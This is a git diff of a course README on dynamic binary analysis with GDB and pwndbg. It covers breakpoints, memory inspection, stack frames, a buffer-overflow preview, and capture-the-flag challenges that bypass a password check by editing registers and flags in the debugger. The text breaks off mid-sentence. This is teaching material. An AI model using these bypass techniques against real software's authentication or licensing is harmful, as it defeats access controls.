diff --git a/chapters/binary-analysis/dynamic-analysis/reading/README.md b/chapters/binary-analysis/dynamic-analysis/reading/README.md index d440878..f2a0731 100644 --- a/chapters/binary-analysis/dynamic-analysis/reading/README.md +++ b/chapters/binary-analysis/dynamic-analysis/reading/README.md @@ -1,951 +1,951 @@ -# Dynamic Analysis - -## Introduction - -### Objectives & Rationale - -The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. -In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. - -Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1, RSA. -We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. - -Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. - -With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. - -### Prerequisites - -In the current session we will use GDB extensively. -We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. - -To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). - -The executable used in the demo is called sppb and is the challenge 1 binary. - -### Before GDB - -One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far. - -For the purposes of this session it is a good idea to always run`objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. - -```console -objdump -M intel -d [executable] -``` - -## GDB Basic Commands - -### Getting help with GDB - -Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. -For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: - -```text -# Print info about all help areas available. -# Identify the area of your question. -(gdb) help - -# Print info about available data commands. -# Identify the command you want to learn more about. -(gdb) help data - -# Print info about a specific command. -# Find out more about the command you are searching for. -(gdb) help disassemble -``` - -### Opening a program with GDB - -A program can be opened for debugging in a number of ways. -We can run GDB directly attaching it to a program: - -```console -gdb [executable-file] -``` - -Or we can open up GDB and then specify the program we are trying to attach to using the file or file-exec command: - -```console -$ gdb -(gdb) file [executable-file] -``` - -Furthermore we can attach GDB to a running service if we know its process id: - -```text -gdb --pid [pid_number] -``` - -### Disassembling - -GDB allows disassembling of binary code using the `disassemble` command -(it may be shortened to `disas`). -The command can be issued either on a -memory address or using labels. - -```text -(gdb) disassemble *main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -....Output ommited..... - -(gdb) disassemble 0x080491c9 -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -``` - -### Adding Breakpoints - -Breakpoints are important to suspend the execution of the program being debugged in a certain place. -Adding breakpoints is done with the `break` command. -A good idea is to place a breakpoint at the main function of the program you are trying to exploit. -Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. -This means that we can set a breakpoint for the start of our program in two ways: - -```text -(gdb) break *main (when the binary is not stripped of symbols) -(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) -``` - -The general format for setting breakpoints in GDB is as follows: - -```text -(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] -``` - -Issuing the `break` command with no parameters will place a breakpoint at the current address. -GDB allows using abbreviated forms for all the commands it supports. -Learning these abbreviations comes with time and will greatly improve you work output. -Always be on the lookout for using abbreviated commands - -The abbreviated command for setting breakpoints is simply `b`. - -### Listing Breakpoints - -At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: - -```text -(gdb) info breakpoints -``` - -You can also issue the abbreviated form of the command - -```text -(gdb) i b -``` - -### Deleting Breakpoints - -Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoints number, as it is listed in the output of the -`info breakpoints` command. - -```text -(gdb) delete breakpoints [breakpoint_number] -``` - -You can also delete all active breakpoints by issuing the following the `delete breakpoints` command with no parameters: - -```text -(gdb) delete breakpoints -``` - -Once a breakpoint is set you would normally want to launch the program into execution. -You can do this by issuing the `run` command. -The program will start executing and stop at the first breakpoint you have set. - -```text -(gdb) run -``` - -#### Execution Flow - -Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: - -```text -(gdb) help continue -# Continue program being debugged, after signal or breakpoint. -# If proceeding from breakpoint, a number N may be used as an argument, -# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached). - -(gdb) help stepi -# Step one instruction exactly. -# Argument N means do this N times (or till program stops for another reason). - -(gdb) help nexti -# Step one instruction, but proceed through subroutine calls. -# Argument N means do this N times (or till program stops for another reason). -``` - -You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`). - -If at any point you want to start the program execution from the beginning you can always reissue the `run` command. - -Another technique that can be used for setting breakpoints is using offsets. - -As you already know, each assembly instruction takes a certain number of bytes inside the executable file. -This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. - -```text -(gdb) break *main -Breakpoint 1 at 0x80491d0 -(gdb) run -Starting program: sppb - -Breakpoint 1, 0x80491d0 in main () -(gdb) disassemble main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -.....Output ommited..... -(gdb) break *main+4 -Breakpoint 2 at 0x80491cd -``` - -### Examine and Print, Your Most Powerful Tools - -GDB allows examining of memory locations be them specified as addresses or stored in registers. -The `x` command (for *examine*) is arguably one of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. -The format for the `examine` command is as follows: - -```text -(gdb) x/nfu [address] - n: How many units to print - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - u: Unit - b: Byte - h: Half-word (2 bytes) - w: Word (4 bytes) - g: Giant word (8 bytes) - i: Instruction (read n assembly instructions from the specified memory address) -``` - -In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in registers and variables. -The format for the `print` command is as follows: - -```text -(gdb) p/f [what] - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - i Instruction (read n assembly instructions from the specified memory address) -``` - -For a better explanation please follow through with the following example: - -```text -# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint. -# At this point we want to see which are the following 10 instructions. -(gdb) x/10i 0x80491cd - 0x80491cd : sub esp,0x4 - 0x80491d0 : mov eax,ds:0x804c030 - 0x80491d5 : push 0x0 - 0x80491d7 : push 0x1 - 0x80491d9 : push 0x0 - 0x80491db : push eax - 0x80491dc : call 0x8049080 - -# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion). -# The other parameter will be an address where the input will be stored. -(gdb) x/s 0x804a02a -0x804a02a: "%d" - -# We now set a breakpoint for *main+56. -(gdb) break *0x08049201 -Breakpoint 3 at 0x08049201 -(gdb) continue -Continuing. - -Breakpoint 3, 0x08049201 in main () - -# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. -# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input). -# Take note that in GDB registers are preceded by the "$" character very much like variables. -(gdb) x/d 0xffffcf70 <- (your address) -0xffffcf70: -# Now let's print the contents of the eax register as hexadecimal. -(gdb) p/x $eax -$1 = - -# The diference between p and x can be observed by issuing the following commands: -x/s 0x804a030 -0x804a030: "Your password is: %d. Evaluating it...\n" - -p /s 0x804a030 - -# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). - -# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves. -# As you can see the address holds the memory for the beginning of the string. -# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format -# You can think of it as "x" dereferencing while "p" not dereferencing -``` - -### GDB Command file - -When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. -GDB commands files will allow you to run a specific set of commands automatically after each command you issue manually. -This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the main target when exploiting. - -The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which translates to the same output. - -In order to use this option you must first create your commands file. -This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack. - -The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the session. - -Command file template: - -```text -display/10i $eip -display/x $eax -display/x $ebx -display/x $ecx -display/x $edx -display/x $edi -display/x $esi -display/x $ebp -display/32xw $esp -``` - -In order to view all register values you could use the `x` command. -However the values of all registers can be obtained by running the`info all-registers` command: - -```text -(gdb) info all-registers -eax 0x8048630,134514224 -ecx 0xbffff404,-1073744892 -edx 0xbffff394,-1073745004 -ebx 0xb7fc6ff4,-1208193036 -esp 0xbffff330,0xbffff330 -ebp 0xbffff368,0xbffff368 -esi 0x0,0 -edi 0x0,0 -eip 0x80484e9,0x80484e9 -eflags 0x286,[ PF SF IF ] -cs 0x73,115 -ss 0x7b,123 -ds 0x7b,123 -es 0x7b,123 -fs 0x0,0 -gs 0x33,51 -st0 *value not available* -st1 *value not available* -st2 *value not available* -st3 *value not available* -st4 *value not available* -st5 *value not available* -st6 *value not available* -st7 *value not available* -fctrl 0x37f,895 -fstat 0x0,0 -ftag 0xffff,65535 -fiseg 0x0,0 -fioff 0x0,0 -foseg 0x0,0 ----Type to continue, or q to quit--- -fooff 0x0,0 -fop 0x0,0 -mxcsr 0x1f80,[ IM DM ZM OM UM PM ] -ymm0 *value not available* -ymm1 *value not available* -ymm2 *value not available* -ymm3 *value not available* -ymm4 *value not available* -ymm5 *value not available* -ymm6 *value not available* -ymm7 *value not available* -mm0 *value not available* -mm1 *value not available* -mm2 *value not available* -mm3 *value not available* -mm4 *value not available* -mm5 *value not available* -mm6 *value not available* -mm7 *value not available* -``` - -One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. -Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. -In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter. - -### Using GDB to modify variables - -GDB can be used to modify variables during runtime. -In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches. - -## Pwndbg - -As you can see using GDB can be cumbersome, this is why we recommend using the pwndbg plug-in. -The tutorial as well as the repository of the project can be found here [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg") - -Give the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the`pwndbg` plug-in. -Some of the advantages of using pwngdb include: - -- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) -- Automatic dereferencing and following through of memory locations -- Color coding - -An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). - However, this tutorial is designed with Pwndbg in mind. - -#### Pwndbg Commands - -`pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints: - -```text -Usage: pdis 0x80491d0 -``` - -If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed - -The `stepi` command has the same effect as in GDB however, if you are running Pwndbg you will notice that after each step Pwndbg will automatically print register values, several lines of code from eip -register and a portion of the stack: - -```text -pwndbg> stepi - -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -────────────────────────────────────[ REGISTERS ]──────────────────────────────────── -*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 - EBX 0x0 - ECX 0xa00af61b - EDX 0xffffcfb4 ◂— 0x0 - EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */ -─────────────────────────────────────[ DISASM ]────────────────────────────────────── - 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> - ► 0x80491d5 push 0 - 0x80491d7 push 1 - 0x80491d9 push 0 - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - 0x80491f0 call puts@plt - - 0x80491f5 add esp, 4 -──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── -In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c - 6 execve("/bin/sh", 0, 0); - 7 } - 8 - 9 int main() - 10 { - ► 11 setvbuf(stdout, NULL, _IOLBF, 0); - 12 int readValue = 0; - 13 - 14 printf("Please provide password: \n"); - 15 scanf("%d", &readValue); - 16 -──────────────────────────────────────[ STACK ]────────────────────────────────────── -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── - ► f 0 0x80491d5 main+12 - f 1 0xf7de0fd6 __libc_start_main+262 - -``` - -You can always use the following commands to obtain context at any given moment inside the debug process: - -- `context reg` -- `context code` -- `context stack` -- `context all` - -One additional Pwndbg command which can be used to show values in registers is the `telescope` command. -The command dereferentiates pointer values until it gets to a value and prints out the entire trace. - -The command can be used with both registers and memory addresses: - -```text -pwndbg$ telescope $esp -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -pwndbg> telescope 0xffffcf84 -00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b -04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... -05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' -06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -07:001c│ 0xffffcfa0 ◂— 0x1 -``` - -In the example above, the memory address 0x8048630 was loaded into EAX. -That is why examining the register or the memory location gives the same output. - -For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command It is always a better idea to use Pwndbg commands when available. -However you should also know the basics of using GDB as well. - -#### Altering variables and memory with Pwndbg and GDB - -In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: - -- `$pc - $eip` -- `$sp - $esp` -- `$fp - $ebp` - -In addition to these there are also two registers which can be used to view the processor state `$ps - processor status` - -Values of memory addresses and registers can be altered at execution time. -Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session. - -The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. - -Using GDB the `$eflags` register can be easily modified: - -```text -pwndbg> reg eflags -EFLAGS 0x282 [ cf pf af zf SF IF df of ] -Set the ZF flag -pwndbg> set $eflags |= (1 << 6) -Clear the ZF flag -pwndbg> set $eflags &= ~(1 << 6) -``` - -Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. - -The `set` command (GDB native) can be used to modify values that reside inside memory. - -```text -pwndbg> telescope 0x804a010 -00:0000│ 0x804a010 ◂— 'Please provide password: ' -01:0004│ 0x804a014 ◂— 'se provide password: ' -02:0008│ 0x804a018 ◂— 'rovide password: ' -03:000c│ 0x804a01c ◂— 'de password: ' -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 - -pwndbg> set {char [14]} 0x804a010 = "No pass here" -Written 28 bytes to 0x8048630 -pwndbg> telescope 0x8048630 -00:0000│ 0x804a010 ◂— 'No pass here' -01:0004│ 0x804a014 ◂— 'ass here' -02:0008│ 0x804a018 ◂— 'here' -03:000c│ 0x804a01c ◂— 0x70200000 -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 -``` - -As you can see the string residing in memory at address `0x8048630` has been modified using the `set` command. - -Pwngdb does not offer enhancements in modifying registry values. -For modifying registry values you can use the GDB `set` command. - -``` {.code} -pwngdb> p/x $eax -$10 = 0x1 -pwngdb> set $eax=0x80 -pwngdb> p/x $eax -$11 = 0x80 -``` - -## The Stack - -This section details process of function calling in detail. -Understanding function calling and stack operations during program execution is esential to exploitation. - -The stack is one of the areas of memory which gets the biggest attention in exploitation writing. - -### Stack Growth - -The stack grows from high memory addresses to low memory addresses. - -```text -pwndbg> pdis $eip - - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - ► 0x80491f0 call puts@plt - -pwndbg> p/x $esp -$1 = 0xffffcf6c -pwndbg> si -0x8049050 in puts@plt () -pwndbg> p/x $esp -$5 = 0xffffcf68 -``` - -As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. -The next instruction that is about to be executed is a push (it pushes `0x0` on the stack). -We execute the instruction and then reevaluate the value of `$esp`. -As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). - -### Frame Pointers and Local Function Variables - -Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. - -This container is called a function frame. -The idea behind it is that the processor must know which area of the stack belongs to which function. - -In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. -Can you tell what they are based on the output below? - -```text -pwndbg> break main -Breakpoint 1 at 0x80484c8 -pwndbg> run -[----------------------------------registers-----------------------------------] - EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' - EBX 0x0 - ECX 0xb8a6a751 - EDX 0xffffcfb4 ◂— 0x0 - EDI 0x80490a0 (_start) ◂— xor ebp, ebp - ESI 0x1 - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 ◂— 0x1 - EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] -[-------------------------------------code-------------------------------------] - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 - 0x080491d5 <+12>: push 0x0 - 0x080491d7 <+14>: push 0x1 - 0x080491d9 <+16>: push 0x0 - 0x080491db <+18>: push eax - -[------------------------------------stack-------------------------------------] -00:0000│ esp 0xffffcf70 ◂— 0x1 -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 - -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080491d0 in main () -pwndbg> disass password_accepted - - - 0x080491b2 <+0>: push ebp - 0x080491b3 <+1>: mov ebp,esp - 0x080491b5 <+3>: push 0x0 - 0x080491b7 <+5>: push 0x0 - 0x080491b9 <+7>: push 0x804a008 - 0x080491be <+12>: call 0x8049070 - 0x080491c3 <+17>: add esp,0xc - 0x080491c6 <+20>: nop - 0x080491c7 <+21>: leave - 0x080491c8 <+22>: ret - -``` - -What we did is we created a breakpoint for the start of the main function and then ran the program. -As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. - -We then set a breakpoint for another function called `pass_accepted`, continued execution and entered a password that we know is going to pass validation. -Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. - -The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. - -In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container(`mov ebp,esp`). - -For a visual explanation please see below: - -

- Sublime's custom image -

- -As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame. -That is why it is most often referred to as the frame pointer. - -In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function - -If you analyze the instructions at the beginning of main, you can spot these as being: - -- An `and esp,0xfffffff0` instruction. - -- A `sub` insctruction that subtracts a hex value from ESP. - -The first of the two instructions has the purpose of aligning the stack to a specific address boundary. -This is done to increase processor efficiency. -In our specific case, the top of the stack gets aligned to a 16 byte multiple address. - -One of the purposes of the stack inside functions is that of offering address space in which to place local variables. -The second instruction preallocates space for local function variables. - -Let's see how local variables are handled inside assembly code. - -```c -#include -int main() -{ - int a; - a=1; - return 0; -} -``` - -```text -kali@kali:~/sss$ gdb test -GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 -Copyright (C) 2012 Free Software Foundation, Inc. -License GPLv3+: GNU GPL version 3 or later -This is free software: you are free to change and redistribute it. -There is NO WARRANTY, to the extent permitted by law. Type "show copying" -and "show warranty" for details. -This GDB was configured as "i686-linux-gnu". -For bug reporting instructions, please see: -... -Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. -pwndbg> break main -Breakpoint 1 at 0x80483ba -pwndbg> run -[----------------------------------registers-----------------------------------] -EAX: 0x1 -EBX: 0xb7fc6ff4 --> 0x1a0d7c -ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c -ESI: 0x0 -EDI: 0x0 -EBP: 0xbffff378 --> 0x0 -ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) -EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) -[-------------------------------------code-------------------------------------] - 0x80483b4
:, push ebp - 0x80483b5 :,mov ebp,esp - 0x80483b7 :,sub esp,0x10 -=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 - 0x80483c1 :,mov eax,0x0 - 0x80483c6 :,leave - 0x80483c7 :,ret - 0x80483c8:,nop -[------------------------------------stack-------------------------------------] -0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c -0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) -0012| 0xbffff374 --> 0x0 -0016| 0xbffff378 --> 0x0 -0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) -0024| 0xbffff380 --> 0x1 -0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080483ba in main () -``` - -As you can see the operations that relate to the stack are: - -- The old frame pointer is saved. -- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame). -- `0x10` is subtracted from ESP (reserve space for local variables). -- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1). - -### Function Parameters - -The stack is also used to pass in parameters to functions. - -In the process of calling a function we can define two entities. -The callee (the function that gets called) and the caller (the function that calls). - -When a function is called, the caller pushes the parameters for the callee on the stack. -The parameters are pushed in reverse order. - -When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it's frame. - -At this point it makes sense to remember the following cases: - -- When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. -- When EBP-value is referred to it is generally a referral to a local variable. - -Lets see how this happens with the following code: - -```c -#include - -int add(int a, int b) -{ - int c; - c=a+b; - return c; -} - -int main() -{ - add(10,3); - return 0; -} -``` - -```text -pwndbg> pdis 0x080483ca -Dump of assembler code for function main: - 0x080483ca <+0>:,push ebp #save the old frame pointer - 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer - 0x080483cd <+3>:,sub esp,0x8 #create space for local variables - 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called - 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called - 0x080483df <+21>:,call 0x80483b4 #call the function - 0x080483e4 <+26>:,mov eax,0x0 - 0x080483e9 <+31>:,leave - 0x080483ea <+32>:,ret -End of assembler dump. -pwndbg> pdis 0x080483b4 -Dump of assembler code for function add: - 0x080483b4 <+0>:,push ebp #save the old frame pointer - 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer - 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables - 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) - 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) - 0x080483c0 <+12>:,add eax,edx #add the registers - 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) - 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it - 0x080483c8 <+20>:,leave - 0x080483c9 <+21>:,ret -End of assembler dump. -``` - -As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. - -If you don't understand why the offset for the parameters starts at EBP+0x08 and not EBP follow through with the next section. - -### Calling functions (call and ret) - -When calling a function the callee places the return address on the stack. -This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution. - -The last instruction in functions is usually a `ret` instruction that resumes execution to the callee. - -For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. - -The call instruction could be translated to the following instructions: - -- `push eip` -- `mov eip, address_of_called_function` - -The ret instruction could be translated into `pop eip`. - -The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well: - -

- -

- -### Next Section Preview: Buffer Overflows - -Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. - -A buffer overflow takes place when there is a lack of checking regarding boundaries and usually result in complete control of the program's instruction pointer. -This takes place when a buffer overflows its boundaries and overwrites the return address of a function. - -A typical example of buffer overflows can be seen in the following picture: - -

- -

- - -## Challenges - -Use GDB and pwndbg to run the code provided in the Activities section. - -### 01. Challenge - Explore The Simple Password Protected Bash - -The executable gets input from the user and evaluates it against a static condition. -If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. - -Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. - -Gather as much info about the executable as possible through the techniques you have learned in previous sessions. - -Think of modifying registers for forcing the executable to call thefunction (there is more than one way of doing this). - -### 02. Challenge - Simple Password Protected Bash Destruction - -What is the condition against which your input is evaluated in the executable contained in the executable `sppb`? - -The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes). - -### 03. Challenge - Domino - -Analyze the binary, reverse engineer what it does and get a nice message -back. - -### 04. Challenge - Call me - -Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag - -Hint: There is something 